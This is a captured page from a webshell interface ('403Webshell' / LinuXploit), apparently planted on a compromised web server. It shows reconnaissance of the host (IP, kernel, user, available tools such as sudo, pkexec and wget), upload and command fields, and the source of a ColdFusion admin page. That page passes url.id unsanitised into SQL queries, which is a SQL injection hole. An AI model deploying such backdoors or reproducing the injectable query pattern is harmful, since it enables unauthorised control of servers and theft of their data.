403Webshell
Server IP : 104.21.21.239  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/cgny/public_html/newadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/cgny/public_html/newadmin/editcalendarreport.cfm
<cfcontent type="text/html;charset=iso-8859-1">
<cfprocessingDirective pageencoding="iso-8859-1">
<cfset setEncoding("Form", "ISO-8859-15")>
<cfinclude template="header.cfm">


<div id="content">
  <div id="content-header">
  </div>
  <div class="container-fluid" style="margin-left:200px;">

<cfquery name="getone"  datasource="#ds#">
	select * from CalendarLinkStats
	where showid = #url.id#
	order by showdate
</cfquery>

<Table>
	<tr>
		<td style="vertical-align: top">
			<h1>Links</h1>
			<cfset linkme = 0>
		<table border="1">
		<cfoutput query="Getone">
			<tr><td  style="padding:4px;">#dateformat(showdate,'m/d/yy')#</td>
			<td  style="padding:4px;">#views#</td></tr>
			<cfset linkme = linkme + views>
		</cfoutput>		
		
			 </table>
			 
			 		<Cfoutput><b>Total: </b> #linkme#</Cfoutput>

		</td>
		
		<Td>
			
			&nbsp;
			&nbsp;
			&nbsp;
		</Td>		<cfquery name="gettwo"   datasource="#ds#">
	select * from CalendarLinkStatsBuy
	where showid = #url.id#
		order by showdate

</cfquery>
			<cfset linkme = 0>

					<td style="vertical-align: top">
			<h1>Buy Button</h1>
						<cfset linkme = 0>

		<table border="1">
		<cfoutput query="gettwo">
			<tr><td style="padding:4px;">#dateformat(showdate,'m/d/yy')#</td>
			<td  style="padding:4px;">#views#</td></tr>			<cfset linkme = linkme + views>

		</cfoutput>		
			 </table>
						 		<Cfoutput><b>Total: </b> #linkme#</Cfoutput>

		</td>
	</tr>

</Table>	
	


   </div>
<!--Footer-part-->
<br><br><br><br>

<cfinclude template="footer.cfm">




Youez - 2016 - github.com/yon3zu
LinuXploit